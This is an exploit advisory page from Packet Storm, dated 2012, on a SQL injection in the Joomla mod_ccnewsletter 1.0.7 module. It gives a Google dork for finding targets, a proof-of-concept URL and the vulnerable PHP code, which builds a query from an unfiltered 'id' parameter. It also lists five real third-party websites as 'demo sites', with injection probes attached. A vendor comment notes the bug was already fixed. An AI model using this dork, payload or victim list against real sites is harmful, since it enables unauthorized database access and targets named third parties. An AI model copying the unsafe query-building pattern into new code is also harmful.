exploit the possibilities

Joomla CCNewsLetter 1.0.7 SQL Injection

Joomla CCNewsLetter 1.0.7 SQL Injection
Posted Apr 23, 2012
Authored by E1nzte1N

The Joomla CCNewsLetter module version 1.0.7 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 5b3419af47a3543fb8d2d45ff7bd885d

Joomla CCNewsLetter 1.0.7 SQL Injection

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ########################################### 7
1 I'm E1nzte1N 1337 Member from 1337 DataBase 1
3 ########################################### 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
=============================================================
-={ Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity }=-
=============================================================
########################################################################################################
# Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity
# Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html
# Version : 1.0.7
# Date : 23/04/2012
# Author : E1nzte1N
# E-mail : bluescreenfx@gmail.com
# Category : webapps
# Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php
# Tested on : Windows
########################################################################################################

#Exploit/p0c :
http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]

########################################################################################################
Bug on file popup.php, in line >>$content_id = JRequest::getVar( 'id', '', 'get', 'string');
========================================================================================================

if(!isset($mainframe))
$mainframe =& JFactory::getApplication('site');
$db =& JFactory::getDBO();
$content_id = JRequest::getVar( 'id', '', 'get', 'string'); <<= request string value "id" without filtering.
$query = 'SELECT * FROM #__content WHERE id ='.$content_id;
$db->setQuery( $query );
$row = $db->loadObject();

=========================================================================================================

# Demo Sites : => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71'
=> http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109'
=> http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588'
=> http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6'
=> http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63'


########################################################################################################

==>> Special Thanks <<==
...:::' 1337day Inj3ct0r TEAM ':::...
[ All Staff & 31337 Member Inj3ct0r TEAM ]
, And All Inj3ct0r Fans & All Hacktivist,,, :-)


############################################################################
[ Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM. ]
[ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ]
############################################################################


# 1337day.com [2012-04-23]

Comments (1)

RSS Feed Subscribe to this comment feed
chillcreations

The issue is known for some time internally and has already been fixed a year ago, see
www.chillcreations.com/blog/5-ccnewsletter…

The solution is to update to the latest version of ccNewsletter!

Comment by chillcreations
2012-04-24 10:01:00 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    4 Files
  • 21
    Oct 21st
    2 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close